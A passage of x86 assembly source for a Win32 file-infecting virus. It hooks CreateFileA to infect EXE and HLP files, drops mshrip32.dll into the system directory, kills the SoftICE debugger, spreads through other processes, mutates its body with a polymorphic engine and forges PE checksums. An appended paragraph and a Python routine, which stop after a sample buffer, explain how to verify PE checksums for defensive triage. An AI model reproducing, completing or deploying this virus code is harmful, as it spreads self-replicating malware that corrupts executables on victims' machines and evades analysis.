cmp [ebp+k32_crcs+ecx*4-vstart],eax ;crc32 == my func ?
jz @@5
sub edx,-4
jmp @@4
gk32a_f_a:
jmp gk32a_f
@@3_a:
jmp @@3
@@5:sub edx,[ebx+32] ;get addr of the new func.
sub edx,edi
shr edx,1
add edx,[ebx+36]
add edx,edi
movzx edx,word ptr [edx]
shl edx,2
add edx,[ebx+28]
mov edx,[edx+edi]
add edx,edi
pop ecx ebx
movzx eax,word ptr [ebp+ecx*2+k32_addrs-vstart]
neg ax
mov [ebp+eax],edx ;store its
@@5a:inc ecx
mov eax,edi
rol eax,8
sub al,0BFh
jz @@5b
cmp ecx,14
jz @@5a
@@5b:cmp ecx,count
jnz @@3_a
push p_number+1 ;update Sleep function
pop ecx
@@6:movzx eax,word ptr [ebp+process_maps+ecx*2-vstart-2]
neg ax
mov [ebp+eax+2],edx
@@7:loop @@6
test al,0C3h
gk32a_f equ $-1
pop eax
push cs ;anti-emulator
lea eax,[ebp+@anti_e-vstart]
push eax
retf
get_k32_apis endp
kill_st proc
call @sNT+10
@s95:db '\\.\SICE',0 ;name drivers
@sNT:db '\\.\NTICE',0
pop ebx
call open_file ;open SoftICE 95/98 or
jz @ks_nt ; SoftICE NT/2k driver
dec eax
push eax
mov eax,0
lpCloseHandle equ $-4
call eax
jmp @ks_kill ;kill process
@ks_nt:
sub ebx,@s95-@sNT ;open the second driver
call open_file
jz @ks_dos
dec eax
call [ebp+lpCloseHandle-vstart]
@ks_kill:
push eax
mov eax,0
lpExitProcess equ $-4
call eax
@ks_dos:
cmp dword ptr fs:[32],0 ;TD32 etc.
jnz @ks_kill
ret
open_always_file:
sub eax,eax ;create file always
push eax ;useful for droppers
mov cl,80h
push ecx 2
jmp $+8
open_file:
sub eax,eax ;open file in ebx
push eax edx 3
cdq
mov dl,0C0h
bswap edx
push eax eax edx ebx
mov eax,0
lpCreateFile equ $-4
call eax
inc eax
ret
kill_st endp
check_resident proc
push ebp 1 0 ;create mutex or get if it
mov eax,0 ;has been created => in mem
lpCreateMutexA equ $-4
call eax
xchg eax,ebx
mov eax,0
lpGetLastError equ $-4
call eax
xchg eax,esi
or esi,esi
jz @cr_f
push ebx
mov eax,0
lpReleaseMutex equ $-4
call eax
@cr_f:or esi,esi
pop eax
jnz __return
jmp eax
check_resident endp
create_process_maps proc
mov byte ptr [ebp+error-vstart],1
call build_dropper ;create dropper in sys dir
jc cpm_fnodeal
mov eax,0
lpGetCurrentProcessId equ $-4
call eax
mov [ebp+if_parent-vstart],eax
sub ebx,ebx
push 80h
cpm_shared_mem equ $-4
push 7
mov eax,0
lpSetErrorMode equ $-4
call eax
pop ecx
lea edi,[ecx+vbody]
push ecx
mov esi,ebp
mov ecx,vsize
rep movsb
cpm_nxproc:
pop eax
lea edi,[eax+8+ebx*8]
push eax
mov [eax],edi
call @@1
dd 0,0,0,0 ;hProc, hThr, ProcID, ThrID
@@1:pop esi
lea eax,[ebp+vsize]
push esi eax 68
pop ecx
@@1a:mov [eax],ch
inc eax
loop @@1a
push ecx ecx 640 1 ecx ecx 80h ecx
cpm_cmdline equ $-5
inc ecx
mov dword ptr [eax-6*4],ecx
mov eax,0
lpCreateProcessA equ $-4
call eax
or eax,eax
jz cpm_failed
lodsd ;get hProcess and ProcessID
stosd
lodsd
lodsd
mov edx,eax
stosd
movzx esi,word ptr [ebp+process_maps+ebx*2-vstart]
neg si
add esi,ebp
movzx ecx,word ptr [esi-2]
mov eax,4096
call malloc
xchg eax,edi
rep movsb ;copy one to mem
pop esi
push esi
movzx eax,byte ptr [ebp+m_sign-2-vstart]
mov [esi+4],eax ;thread memory sign
mov [esi],ecx ;active flag
push esi count-2
lea edi,[esi+apiz]
lea esi,[ebp+k32_addrs-vstart]
pop ecx
@@2:sub eax,eax
lodsw
neg ax
mov eax,[ebp+eax]
stosd
loop @@2
pop esi
push edx ecx 1F0FFFh
mov eax,0
lpRegisterServiceProcess equ $-4
or eax,eax
jz cpm_winnt
push 1 edx
call eax
cpm_winnt:
mov eax,0
lpOpenProcess equ $-4 ;create inside thread from
call eax ;the dropper
xchg eax,ecx
jecxz cpm_failed
mov edx,0
lpWaitForSingleObject equ $-4
call edx, ecx, 40
lodsd
not eax
xchg eax,ecx
jecxz cpm_failed
inc ebx
cmp bl,p_number
jnz cpm_nxproc
mov al,bh ;remove the virus from the
mov ecx,(mem_end - newCreateFile) ;current file, live on the
lea edi,[ebp+newCreateFile-vstart] ;other places inside win32
rep stosb
mov byte ptr [ebp+error-vstart],cl
cpm_failed:
pop eax
or ebx,ebx
jnz cpm_fnodeal
call mdealloc
cpm_fnodeal:
mov eax,[ebp+cpm_cmdline-vstart]
mdealloc:
push eax ;deallocate shared memory
mov eax,0
lpUnMapViewOfFile equ $-4
call eax
ret
error db 0
create_process_maps endp
build_dropper proc
mov eax,260 ;generate dropper filename
call malloc
mov [ebp+cpm_cmdline-vstart],eax
mov edi,eax
push 7Fh eax ;no more then 0x80 chars
mov eax,0
lpGetSystemDirectory equ $-4
call eax ;get system directory
or eax,eax
jz bd_failed
call bd_fname
db '\mshrip32.dll',0 ;hmmm, my dropper name
bd_fname:
pop esi
push 14
mov ebx,edi
add edi,eax
pop ecx
rep movsb
call open_always_file ;create its
jz bd_failed
dec eax
push eax
mov esi,1024 ;alloc memory for dropper
call malloc
xchg eax,edi ;edi=output, all is zero
mov eax,60000
push edi
lea esi,[ebp+dropper_data-vstart]
call malloc
xchg ebx,eax
mov [ebp+cpm_shared_mem-vstart],ebx
mov eax,0
lpGetVersion equ $-4
call eax
xor ecx,ecx
bt eax,63
adc edi,ecx
mov [ebx+paramz+(7-1)*4],edi
pop edi
push edi
mov al,[ebp+m_sign-2-vstart]
mov [esi+224],al ;noone knows what is it
bd_read: ;create EXE PE dropper
xor eax,eax
lodsb
cmp al,-1 ;end of data?
jz bd_done
add edi,eax ;next movement
lodsb
xchg eax,ecx
bd_write:
lodsb
stosb ;save data
loop bd_write
jmp bd_read
E8 equ 0E8
bd_done:
push 0
call @@2
dd ?
@@2:push 1024
push dword ptr [esp+12] ;droppers body
push dword ptr [esp+20] ;file handle
mov eax,0
lpWriteFile equ $-4
call eax
push eax dword ptr [esp+8]
call [ebp+lpCloseHandle-vstart]
pop ecx eax eax ;write error ?
jecxz bd_failed
test al,0F9h
bd_failed equ $-1
ret
build_dropper endp
malloc proc
pusha ;allocate shared memory
xchg ebx,eax
sub esi,esi
inc byte ptr [ebp+m_sign-2-vstart]
call m_sign
db "@",0
m_sign:
push ebx esi 4 esi 0-1
mov eax,0
lpCreateFileMappingA equ $-4
call eax
dec eax
jz m_failed
inc eax
push ebx esi esi 2 eax
mov eax,0
lpMapViewOfFile equ $-4
call eax
m_failed:
mov [esp+28],eax
popa
or eax,eax
ret
malloc endp
hookapi proc
mov ebx,0
ha_module equ $-4
cmp word ptr [ebx],'ZM'
jnz ha_failed
movzx esi,word ptr [ebx+60]
add esi,ebx
cmp word ptr [esi],'EP'
jnz ha_failed
mov eax,[esi+80h]
add eax,ebx
fk32:mov esi,eax
mov esi,[esi+12]
cmp [esi+ebx],'NREK'
jz fkok
sub eax,-20
jmp fk32
fkok:mov edx,[eax+16]
add edx,ebx
cmp dword ptr [eax],0
jz ha_failed
push edx
mov esi,[eax]
add esi,ebx
mov edx,esi
sub eax,eax
fklp:cmp dword ptr [edx],0
jz ha_failed2
cmp dword ptr [edx+3],80h
jz finc
mov esi,[edx]
lea esi,[esi+ebx+2]
call fnam
db "CreateFileA",0
fnam:pop edi
fcom:push 12
pop ecx
repe cmpsb
jecxz fapi
finc:inc eax
sub edx,-4
jmp fklp
fapi:shl eax,2
add eax,[esp]
xchg ebx,eax
mov eax,[ebx]
mov ecx,[ebp+cpm_shared_mem-vstart]
mov [ecx+vbody+newCreateFile+1-vstart],eax
lea eax,[ecx+vbody+newCreateFile-vstart]
mov [ebx],eax
pop ecx
ret
ha_failed2:
pop eax
ha_failed:
pop eax
jmp __return
hookapi endp
newCreateFile proc
push 80h
oldCreateFile equ $-4
pusha
call $+5
pop ebp
sub ebp,$-vstart-1
mov ebx,[ebp+cpm_shared_mem-vstart]
lea edi,[ebx+vbody+vsize]
mov word ptr [edi-vsize+__return+11-vstart],9090h
mov esi,[esp+7*4+12]
ncfc:lodsb
stosb
or al,al
jnz ncfc
lea edi,[ebx+active]
lea esi,[ebx+process] ;infect_file hProcess, ProcID
lodsd
xchg ebx,eax
lodsd
mov byte ptr [edi],1 ;active thread
push eax 0 1F0FFFh
call [ebp+lpOpenProcess-vstart]
xchg eax,ecx
jecxz ncf_failed
ncfw:push 40 ebx
call [ebp+lpWaitForSingleObject-vstart]
cmp byte ptr [edi],0
jnz ncfw
ncf_failed:
popa
ret
newCreateFile endp
st_count = 0
dw check_infected-infect_file
infect_file proc
start_thread infect_file
lea esi,[ebx+vbody+vsize]
ifex:lodsb
cmp al,'.'
jnz ifex
dec esi
lodsd
or eax,20202020h
mov ebx,[esp+44]
lea edi,[ebx+active+4]
lea esi,[ebx+process+8*4] ;infect_exe hProcess, ProcID
cmp eax,'exe.'
jz if_2
cmp eax,'plh.'
jnz if_failed
if_call_hlp:
sub esi,8 ;infect_hlp
dec edi
if_2:lodsd
push eax
lodsd
mov byte ptr [edi],1 ;active infect_exe (_hlp)
push eax 0 1F0FFFh
call [ebx+apiz+4*12] ;OpenProcess
xchg eax,ecx
jecxz if_failed - 1
if_r:pop eax
push eax 40 eax
call [ebx+apiz+4*13] ;WaitForSingleObject
cmp byte ptr [edi],0
jnz if_r
pop eax
if_failed:
end_thread infect_file
infect_file endp
dw create_infected-check_infected
check_infected proc
start_thread check_infected
xchg ebx,esi
xor esi,esi
cmp [ebx+paramz+(5-1)*4],1
jz ci_nomem
other_process_mem ebx, 4
ci_nomem:
add esi,[ebx+paramz+(4-1)*4]
mov ecx,[esi-4-tbyte] ;number of the terms in a
or ecx,ecx ;equation
jz ci_failed
cmp ecx,8
jnbe ci_failed
sub esp,128
fsave [esp]
push ecx
imul ecx,-(tbyte+tbyte)
sub ecx,tbyte+tbyte+4+tbyte
lea esi,[esi+ecx] ;data starts here
lea edi,[ebx+vbody+vsize+260]
cmp [ebx+paramz+(5-1)*4],1
jnz $ + 8
lea edi,[ebx+vbody+vsize+260+ci_size/2]
neg ecx
push edi
rep movsb
pop esi ecx
push ecx esi
fld tbyte ptr [esi+tbyte] ;derivation of the equations
fld st(0) ;you'll get two tangents
fld tbyte ptr [esi]
fmul
fld1
fsubp st(2),st
fstp tbyte ptr [esi]
fstp tbyte ptr [esi+tbyte]
sub esi,-(tbyte+tbyte)
loop $ - 21
pop esi ecx
sub esp,tbyte+tbyte
fldz
fldz
fstp tbyte ptr [esp]
fstp tbyte ptr [esp+tbyte]
push esi ecx
imul eax,[esp],tbyte+tbyte ;involution of the equations
fld tbyte ptr [esi]
fld tbyte ptr [esi+tbyte]
fld tbyte ptr [esi+eax+tbyte]
fld tbyte ptr [esi+eax]
fld st(2)
fld st(4)
fxch st(2)
lea edx,[ebp+($+32)-check_infected]
push edx
fyl2x ;over natural logarithm
fld st(0)
frndint
fsubr st(1),st
fxch
fchs
f2xm1
fld1
faddp
fscale
fstp st(1)
fmul
ret
fld tbyte ptr [esp+tbyte+2*dword]
faddp
fstp tbyte ptr [esp+tbyte+2*dword]
call $ - 35 ;we've two points on the curve
fld tbyte ptr [esp+2*dword]
faddp
fstp tbyte ptr [esp+2*dword]
sub esi,-(tbyte+tbyte)
dec dword ptr [esp] ;next term in the equation
jnz $ - 85
pop ecx ecx
fld tbyte ptr [esp+tbyte] ;calculate an angle of the
fld tbyte ptr [esp] ;two tangents of the equation
fld st(1)
fld st(1)
fsub
fxch st(2)
fmul
fld1
fadd
fdiv
fabs
fld1
fpatan
push 180 ;radian -> angle
fimul dword ptr [esp]
fldpi
fdiv
pop eax
sub esp,-(tbyte+tbyte)
mov eax,2*tbyte+dword
cmp dword ptr [ebx+paramz+(5-1)*4],1
jnz $ + 12
sub eax,-(dword-ci_size/2)
fld st(0)
fstp tbyte ptr [esi+eax]
fld tbyte ptr [esi+eax]
fsub
sub esp,tbyte
fstp tbyte ptr [esp]
cmp dword ptr [esp+tbyte-dword],0 ;compare the results
lahf
sub esp,-tbyte
wait
fnrstor [esp]
sub esp,-128
sahf
jnz ci_failed
push 1
pop eax
mov [ebx+paramz+(4-1)*4],eax
jmp ci_finish
ci_failed:
xor eax,eax
mov [ebx+paramz+(4-1)*4],eax
ci_finish:
cmp [ebx+paramz+(5-1)*4],1
jz $ + 8
call [ebx+apiz+8*4] ;UnMapViewOfFile
call [ebx+apiz+1*4] ;CloseHandle
end_thread check_infected
check_infected endp
dw infect_hlp-create_infected
create_infected proc
start_thread create_infected
lea edi,[esi+vbody+vsize+260]
push edi
stosd
call $ + 241 ;number of the terms in a
shr eax,29 ;equation
xchg eax,ecx
inc ecx
push ecx
sub esp,128
fnsave [esp]
call $ + 221 ;generate a multiplier (+/-)
sub edx,edx
mov ebx,100000
div ebx
or edx,edx
jz $ - 16
fld1
rcr eax,1
jc $ + 4
fchs
push edx
fimul dword ptr [esp]
fstp tbyte ptr [edi]
pop edx
sub edi,-tbyte
call $ + 119 ;generate an exponent
loop $ - 41 ;next term in the equation
inc ecx
inc ecx
call $ + 110 ;two points on the curve
loop $ - 5
fnrstor [esp]
sub esp,-128
pop eax
stosd
lea ecx,[edi+tbyte]
sub edi,[esp]
xchg eax,edi
pop edi
stosd
pusha ;calculate an angle, it
mov ebx,esi ;means: call other process
mov [esi+paramz+(4-1)*4],ecx
mov [esi+paramz+(5-1)*4],1
lea edi,[esi+active+1]
lea esi,[esi+process+1*8]
lodsd
push eax
lodsd
mov byte ptr [edi],1
push eax 0 1F0FFFh
call [ebx+apiz+4*12] ;OpenProcess
pop esi
push 40 esi
call [ebx+apiz+4*13] ;WaitForSingleObject
cmp byte ptr [edi],0
jnz $ - 9
popa
mov [esi+paramz+(5-1)*4],0
end_thread create_infected
call $ + 66 ;generate an exponent
sub edx,edx
push 11
pop ebx
div ebx
or edx,edx
jz $-14
push edx
fild dword ptr [esp]
call $+15
dt 3FEB8637BD05AF6C69B6r
pop eax ebx
fld tbyte ptr [eax]
xchg ebx,eax
cdq
call $ + 25
mov ebx,1000000
div ebx
push edx
fimul dword ptr [esp]
fsub
fstp tbyte ptr [edi]
pop eax
sub edi,-tbyte
ret
mov eax,0 ;get a random value
lpGetTickCount equ $-4
call eax
add eax,80h
push ecx 33
pop ecx
add eax,eax
jnc $ + 4
xor al,197
loop $ - 6
mov [ebp+($-16)-create_infected],eax
pop ecx
ret
create_infected endp
dw infect_exe-infect_hlp
infect_hlp proc
start_thread infect_hlp
sub esp,16
sub ebx,ebx
mov word ptr [esi+vbody+__return+11-vstart],02EBh
lea eax,[esi+vbody+vsize]
push ebx 80h 3 ebx ebx 0c0000000h eax
call [esi+apiz+4*0] ;open file
inc eax
jz ih_failed
dec eax
push eax
mov bh,80h
push ebx 40h
mov eax,0
lpGlobalAlloc equ $-4
call eax ;GlobalAlloc
mov [esp+4],eax
xchg eax,esi
push 16
pop ecx
sub edx,edx
call read
jc ih_free
lodsd
cmp eax,35f3fh ;hlp signature
jnz ih_free
lodsd
lea edx,[eax+55] ;directory offset
mov ecx,512
lodsd
lodsd
call read
ih_search:
dec ecx
jz ih_free
cmp dword ptr [esi+ecx],'SYS|'
jnz ih_search
cmp dword ptr [esi+ecx+4],'MET'
jnz ih_search
mov eax,[esi-4]
xchg eax,[esi+ecx+8]
xchg eax,edx
push 21
sub esi,-512
pop ecx
call read
lodsd
push 21
pop ecx
sub eax,ecx
add edx,ecx
mov [esp+4+4],edx
mov [esp+8+4],eax
mov edi,[esp+4]
sub edi,-549
lea esi,[ebp+hlp1_s-infect_hlp]
lea eax,[edi+size-hlp1_s]
mov [esp+12+4],eax
push hlp1_e-hlp1_s
pop ecx
rep movsb
push edi
mov ebx,[esp+40+16+8+4]
lea esi,[ebx+vbody]
push esi
sub esi,-vsize
ih_next:
sub esi,4
mov eax,[esi]
call ihck
or edx,edx
jnz ihex
mov al,68h
stosb
mov eax,[esi]
stosd
jmp ihdn
ihex:mov al,0b8h
stosb
mov eax,[esi]
xor eax,edx
stosd
mov al,53
stosb
mov eax,edx
stosd
mov al,80
stosb
ihdn:cmp [esp],esi
jnz ih_next
jmp ihcn
ihck:call ihcv
jc iha1
sub edx,edx
ret
iha1:mov ebx,eax
ihax:mov eax,ebx
call $+9
dd 12345678h
pop edx
sub [edx],12345678h
org $-4
rnd dd 87654321h
mov edx,[edx]
xor [ebp+rnd-infect_hlp],edx
xor eax,edx
call ihcv
jc ihax
xchg eax,edx
call ihcv
jc ihax
xchg edx,eax
ret
ihcv:pusha
push 4
pop ecx
icva:cmp al,' '
jna icvf
cmp al,0f0h
jnbe icvf
cmp al,'"'
jz icvf
cmp al,"'"
jz icvf
cmp al,"`"
jz icvf
cmp al,"\"
jz icvf
ror eax,8
loop icva
test al,0F9h
icvf equ $-1
popa
ret
ihcn:pop eax eax
mov ecx,edi
sub ecx,eax
sub eax,eax
mov [esi+org_ep-vstart],eax
push ecx
sub ecx, p1-hlp1_e+hlp1_e-hlp2_e
mov eax,[esp+12+4+4]
mov [eax],cx
sub esi,vstart-hlp1_e
push hlp2_sz
pop ecx
rep movsb
pop eax
mov esi,[esp+4] ;buffer
sub esi,-528
sub eax,hlp1_s-hlp2_e-21
mov [esi],eax
add [esi+4],eax
mov esi,edi
mov edx,[esp+4+4]
mov ecx,[esp+8+4]
sub eax,ecx
jna ih_free
call read
cmp [esi+4],"`(RR" ;already infected?
jz ih_free
mov ebx,[esp+4]
lea ecx,[edi+eax]
sub ecx,ebx
sub ecx,528
mov eax,[esp+4]
sub eax,-528
mov edx,[eax]
sub edx,ecx
sub [eax],edx
mov edx,[ebx+12]
lea esi,[ebx+528]
call write
mov esi,[esp+4]
push 16
add [esi+12],ecx
sub edx,edx
pop ecx
call write
mov edx,[esi+4]
sub edx,-55
mov ecx,512
sub esi,-16
call write
jmp ih_free
spos:pusha
sub eax,eax
push eax eax edx dword ptr [esp+4*5+8*4]
mov eax,0
lpSetFilePointer equ $-4
call eax
popa
ret
read:call spos
pusha
sub eax,eax
push ecx eax
call $+9
r_ts:dd ?
push ecx esi dword ptr [esp+4*6+8*4]
mov eax,0
lpReadFile equ $-4
call eax
pop ecx
cmp dword ptr [ebp+r_ts-infect_hlp],ecx
jnz $+3
test al,0F9h
popa
ret
write:call spos
pusha
sub eax,eax
push eax
lea ebx,[ebp+r_ts-infect_hlp]
push ebx ecx esi dword ptr [esp+4*5+8*4]
mov eax,[esp+4*5+8*4+4+16+8+40] ;ou! what does it mean :) ?
call [eax+apiz+4*10]
popa
ret
hlp1_s=$
dw 4
dw offset label1-$-2
db "RR(`USER32.DLL',`EnumWindows',`SU')",0
label1=$
dw 4
size dw 0
p1 = $
db "EnumWindows(`"
hlp1_e= $
jmp esp
db "',0)",0
hlp2_e = $
hlp2_sz=hlp2_e-hlp1_e
ih_free:
mov esi,[esp+40+16+4+4]
call [esi+apiz+4*1] ;CloseHandle
mov eax,0
lpGlobalFree equ $-4
call eax
ih_failed:
sub esp,-12
end_thread infect_hlp
infect_hlp endp
dw poly_engine-infect_exe
infect_exe proc
start_thread infect_exe
sub ebx,ebx
lea eax,[esi+vbody+vsize]
push ebx 80h 3 ebx ebx 0c0000000h eax
call [esi+apiz+4*0] ;CreateFileA
inc eax
jz ie_failed
dec eax
push eax ebx eax
mov eax,0
lpGetFileSize equ $-4
call eax
cmp eax,4096
jc ie_close
cmp eax,104857600
jnbe ie_close
mov [ebp+fsize-infect_exe],eax
call $ + 7
db "1",0
push ebx ebx 2 ebx dword ptr [esp+4*5]
call [esi+apiz+4*6] ;CreateFileMappingA
or eax,eax
jz ie_close
push eax ebx ebx ebx 4 eax
call [esi+apiz+28] ;MapViewOfFile
or eax,eax
jz ie_mclose
push eax
cmp word ptr [eax],'ZM'
jnz ie_unmap
cmp word ptr [eax+MZ_crlc],bx
jz ie_tested
cmp word ptr [eax+MZ_lfarlc],64
jc ie_unmap
ie_tested:
mov edi,[eax+MZ_lfanew]
add edi,eax
cmp dword ptr [edi],4550h
jnz ie_unmap
mov eax,[esp+4]
mov [esi+paramz+(3-1)*4],eax
mov eax,[ebp+fsize-infect_exe]
mov [esi+paramz+(4-1)*4],eax
cmp [esi+paramz+(4-1)*4],1
jz ie_unmap
mov ax,[edi+NT_FileHeader.FH_Characteristics]
test ax,IMAGE_FILE_EXECUTABLE_IMAGE
jz ie_unmap
test ax,IMAGE_FILE_DLL
jnz ie_unmap
movzx ecx,[edi+NT_FileHeader.FH_NumberOfSections]
dec ecx
or ecx,ecx
jz ie_unmap
imul eax,ecx,IMAGE_SIZEOF_SECTION_HEADER
movzx edx,[edi+NT_FileHeader.FH_SizeOfOptionalHeader]
mov [ebp+ie_section-infect_exe],eax
lea ebx,[edx+edi+NT_OptionalHeader.OH_Magic]
add ebx,eax
mov eax,[ebx+SH_SizeOfRawData]
push eax
add eax,[ebx+SH_VirtualAddress]
lea ecx,[esi+vbody+inf_ep-vstart]
mov [ecx],eax
mov eax,[edi+NT_OptionalHeader.OH_AddressOfEntryPoint]
mov [ecx+5+6],eax
pop eax
add eax,[ebx+SH_PointerToRawData]
add eax,[esi+paramz+4*0]
add eax,dword ptr [esi+vbody+vsize+260]
mov ecx,[edi+NT_OptionalHeader.OH_FileAlignment]
add eax,ecx
cdq
dec eax
div ecx
mul ecx
mov [ebp+align_d-infect_exe],eax
call [esi+apiz+4*8] ;UnMapViewOfFile
call [esi+apiz+4*1] ;CloseHandle
sub ebx,ebx
call $ + 7
db "1",0
align_d equ $+1
push 80h ebx 4 ebx dword ptr [esp+4*5]
call [esi+apiz+4*6] ;CreateFileMappingA
push eax ebx ebx ebx 2 eax
call [esi+apiz+4*7] ;thx2 Bumblebee for his help
push eax
add eax,[eax.MZ_lfanew]
xchg eax,edi
mov ebx,0
ie_section equ $-4
movzx edx,[edi+NT_FileHeader.FH_SizeOfOptionalHeader]
lea eax,[edx+edi+NT_OptionalHeader.OH_Magic]
movzx ecx,[edi+NT_FileHeader.FH_NumberOfSections]
add eax,ebx
ie_change_flag:
or [eax.SH_Characteristics],IMAGE_SCN_MEM_WRITE
sub eax,IMAGE_SIZEOF_SECTION_HEADER
loop ie_change_flag
lea eax,[edx+edi+NT_OptionalHeader.OH_Magic]
add ebx,eax
mov eax,[esi+vbody+inf_ep-vstart]
mov [edi+NT_OptionalHeader.OH_AddressOfEntryPoint],eax
pusha
mov ecx,[esi+paramz+4*0]
mov [esp+7*4],ecx
mov edi,[ebx+SH_SizeOfRawData]
add [esp+7*4],edi
add edi,[ebx+SH_PointerToRawData]
add edi,[esp+7*4+4]
lea esi,[esi+vbody+vsize+260+ci_size] ;poly vbody
rep movsb
popa
mov eax,[esi+paramz+4*0]
add eax,[ebx+SH_SizeOfRawData]
mov ecx,[edi+NT_OptionalHeader.OH_FileAlignment]
add eax,ecx
cdq
dec eax
div ecx
mul ecx
mov [ebx+SH_SizeOfRawData],eax
push eax
mov eax,[ebx+SH_VirtualSize]
add eax,vsize+68
mov ecx,[edi+NT_OptionalHeader.OH_SectionAlignment]
add eax,ecx
cdq
dec eax
div ecx
mul ecx
pop ecx
cmp eax,ecx
jnc ie_1
mov eax,ecx
ie_1:mov [ebx+SH_VirtualSize],eax
add eax,[ebx+SH_VirtualAddress]
cmp eax,[edi+NT_OptionalHeader.OH_SizeOfImage]
jc ie_2
mov [edi+NT_OptionalHeader.OH_SizeOfImage],eax
ie_2:or dword ptr [ebx+SH_Characteristics], \
IMAGE_SCN_CNT_CODE or IMAGE_SCN_MEM_EXECUTE or \
IMAGE_SCN_MEM_WRITE
.if dword ptr [edi+NT_OptionalHeader.OH_CheckSum] != 0
mov eax,0
fsize equ $-4
add eax,[esi+paramz+(1-1)*4]
mov [esi+paramz+(2-1)*4],eax
mov eax,[esi+paramz+(4-1)*4]
mov [edi+NT_OptionalHeader.OH_CheckSum],eax
.endif
push esi
mov edi,[ebp+align_d-infect_exe]
add edi,[esp+4]
lea esi,[esi+vbody+vsize+260]
lodsd
sub eax,4-tbyte
sub edi,eax
xchg eax,ecx
rep movsb
pop esi
ie_unmap:
call [esi+apiz+4*8] ;UnMapViewOfFile
ie_mclose:
call [esi+apiz+4*1] ;CloseHandle
ie_close:
call [esi+apiz+4*1] ;CloseHandle
ie_failed:
end_thread infect_exe
other_process proc
pusha
mov ecx,[esp+36]
mov ebx,esi
lea edi,[esi+active+ecx]
lea esi,[esi+process+ecx*8]
lodsd
push eax
lodsd
mov byte ptr [edi],1
push eax 0 1F0FFFh
call [ebx+apiz+4*12] ;OpenProcess
pop esi
push 40 esi
call [ebx+apiz+4*13] ;WaitForSingleObject
cmp byte ptr [edi],0
jnz $ - 9
popa
ret 4
other_process endp
infect_exe endp
dw checksum-poly_engine
poly_engine proc
start_thread poly_engine
mov ebx,esi
lea esi,[ebx+vbody+vsize]
lea edi,[esi+260+ci_size]
push ebx edi
sub ecx,ecx
mov edx,vsize / 2
mov eax,0E8h
stosd
mov eax,242C8300h
stosd
mov al,5
stosb
@@a:call random
test al,1
jnz @@b
cmp edx,1
jz @@v
sub esi,4
push esi
lodsd
call @@1_a
pop esi
dec edx
jmp @@k
@@b:test al,2
jnz @@c
@@v:dec esi
dec esi
push esi
lodsw
inc ecx
call @@1_a
pop esi
sub cl,cl
jmp @@k
@@c:test al,4
jnz @@e
call @@1 ;push random value DWORD
jc $+7
call @@2
jmp @@l
@@e:inc ecx ;push random value WORD
call @@1
jc $+7
call @@2
sub cl,cl
jmp $+5
@@k:dec edx
jz $+4
@@l:jmp @@a
mov ax,0E4FFh
stosw
jmp pe_failed
@@1:call random ;push random value
test al,1
jnz @@1_d
@@1_a:xchg eax,ebx ;push certain value
@@1_b:jecxz @@1_c ;push WORD
mov al,66h
stosb
@@1_c:call @@3_a
test al,0F9h
@@1_d equ $-1
ret
@@2:call random ;POP reg32 or ADD ESP,4
test al,1
jnz @@2_b
and al,7
cmp al,4
jz @@2
or al,al
jz @@2
jecxz @@2_a
xchg eax,ebx
mov al,66h
stosb
xchg ebx,eax
@@2_a:add al,58h
stosb
ret
@@2_b:mov ax,0C483h
stosw
mov al,4
jecxz @@2_c
mov al,2
@@2_c:stosb
ret
@@3:xchg eax,ebx ;push certain value in EAX
@@3_a:mov al,68h ; in EBX
stosb
xchg eax,ebx
jecxz @@3_b
stosw
ret
@@3_b:stosd
ret
random:
mov eax,0BFF71234h
push ecx 33
pop ecx
@@r:add eax,eax
jnc $+4
xor al,197
loop @@r
mov [ebp+random+1-poly_engine],eax
pop ecx
ret
pe_failed:
pop ecx ebx
sub edi,ecx
mov [ebx+paramz+4*0],edi
end_thread poly_engine
poly_engine endp
dw k32_addrs-checksum
checksum proc
start_thread checksum
xchg ebx,esi
mov ecx,[ebx+paramz+(2-1)*4]
sub edx,edx
shr ecx,1
@@1:lodsw
mov edi,0FFFFh
and eax,edi
add edx,eax
mov eax,edx
and edx,edi
shr eax,10h
add edx,eax
loop @@1
mov eax,edx
shr eax,10h
add ax,dx
add eax,[ebp+4]
mov [ebx+paramz+(4-1)*4],eax
call [ebx+apiz+8*4] ;UnMapViewOfFile
call [ebx+apiz+1*4] ;CloseHandle
end_thread checksum
checksum endp
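The CheckSum update in infect_exe and the `checksum` thread above keep OptionalHeader.CheckSum consistent after the file has been rewritten, so a defender cannot treat a matching checksum as proof that a file is untouched; a non-zero checksum that does not match, on the other hand, is a cheap triage signal. The Python below is an added example, not code from the page or its author. It renders the same word sum the thread computes (16-bit words, end-around carry after each addition, the CheckSum field itself counted as zero, file length added at the end, which is the CheckSumMappedFile convention) and compares it with the stored value. The sample buffer and its checksum offset are constructed; zero-extending a trailing odd byte is an assumption, since the thread above simply halves the byte count.

```python
import struct


def pe_checksum(data: bytes, checksum_offset: int) -> int:
    """Return the PE header checksum of `data`.

    Same word sum as the `checksum` thread above: 16-bit little-endian words
    are added into an accumulator that is folded (end-around carry) after
    every addition, the four bytes of OptionalHeader.CheckSum itself count as
    zero, and the byte length of the file is added at the end.
    `checksum_offset` is the file offset of the CheckSum field
    (e_lfanew + 4 + 20 + 64 in a real PE32 image).
    """
    if checksum_offset % 2 or checksum_offset + 4 > len(data):
        raise ValueError("CheckSum field must be word aligned and inside the buffer")
    length = len(data)
    if length % 2:
        data += b"\x00"  # assumption: a trailing odd byte is zero-extended to a word
    acc = 0
    for off in range(0, len(data), 2):
        if checksum_offset <= off < checksum_offset + 4:
            continue  # the field being computed is treated as zero
        (word,) = struct.unpack_from("<H", data, off)
        acc = (acc + word) & 0xFFFFFFFF
        acc = (acc & 0xFFFF) + (acc >> 16)  # fold the carry back in after each add
    acc = (acc & 0xFFFF) + (acc >> 16)      # final fold (the shr eax,10h / add ax,dx tail)
    acc &= 0xFFFF
    return (acc + length) & 0xFFFFFFFF


def stored_checksum(data: bytes, checksum_offset: int) -> int:
    (value,) = struct.unpack_from("<I", data, checksum_offset)
    return value


def verify_pe_checksum(data: bytes, checksum_offset: int):
    """Return (stored, computed, status).

    status is "unset" when the stored field is 0 (the linker never filled it
    in, which is common and not suspicious on its own), "match", or
    "mismatch" for a non-zero stored value that differs from the computed one.
    """
    stored = stored_checksum(data, checksum_offset)
    computed = pe_checksum(data, checksum_offset)
    if stored == 0:
        return stored, computed, "unset"
    return stored, computed, "match" if stored == computed else "mismatch"


# Constructed 16-byte sample: the CheckSum "field" sits at offset 4 and holds a
# bogus value, every other word is summed.  This is not a real PE image.
SAMPLE = struct.pack("<8H", 0x0001, 0x0002, 0xAAAA, 0xBBBB, 0xFFFF, 0xFFFF, 0x0003, 0x0004)
SAMPLE_CHECKSUM_OFFSET = 4

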